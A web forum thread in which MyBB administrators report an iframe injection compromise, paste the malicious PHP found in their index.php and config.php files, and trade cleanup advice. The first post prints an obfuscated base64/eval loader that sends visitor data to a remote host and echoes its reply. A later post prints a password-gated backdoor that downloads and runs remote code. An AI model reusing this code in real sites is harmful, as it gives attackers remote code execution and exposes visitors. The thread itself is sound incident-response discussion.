Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Not Solved [Security] iframe injection in index.php files....
#1
Not Solved
so a few users have been complaining that norton was throwing alerts when they would login to the forum. one guy actually remembered to save the alert and post it up so I could see what it said and here's what we have:

"Web Attack: Mass Iframe Injection Attack 2; An intrusion attempt by myforumurl.com was blocked; Mon.,Oct 17, 8:42 AM; (IP address removed)."

anyhow, while running the file verification tool, I noticed that all of the index.php files within mybb had the following php code added to the very bottom of the file:

<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

that code was added to the following files:

/index.php
/admin/index.php
/admin/modules/home/index.php
/archive/index.php
#2
Not Solved
hmm., re-upload fresh files from latest myBB download package ( see also 1.6.4 Security Vulnerability )
#3
Not Solved
(2011-10-17, 08:39 PM)ranjani Wrote: hmm., re-upload fresh files from latest myBB download package ( see also 1.6.4 Security Vulnerability )

yep, I just did that for every forum I run.

#4
Not Solved
^ someone also suggested to check config.php for any malicious code - of course, it is generally not writeable ; yet,..
#5
Not Solved
(2011-10-17, 08:50 PM)ranjani Wrote: ^ someone also suggested to check config.php for any malicious code - of course, it is generally not writeable ; yet,..

its writable by default and some folks have had it compromised as well.
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#6
Not Solved
^ though off topic, I do not understand the reason for using CHMOD 666 for config.php
some use 444 !! AND make it writeable only when it is necessary & put back CHMOD 444 !!
#7
Not Solved
out of the 3 mybb installations on my server, I did notice this code in 1 of the 3 config.php files

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '4be5a36cbaca8ab9d2066debfe4e65c1'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
#8
Not Solved
also wanted to note that my showthread.php was infected...
#9
Not Solved
every file on your site can be infected by this issue, as can new files be created, database access, etc can all be compromised. its an "open" exploit that lets most any code be executed
Lost interest, sold my sites, will browse here once in a while. It's been fun.
#10
Not Solved
You have the EXACT same problem as me! I traced the injection to DrHouseNews.Orge.pl! See below two threads:

http://community.mybb.com/thread-106302.html
http://community.mybb.com/thread-106212-page-2.html


Forum Jump:


Users browsing this thread: 1 Guest(s)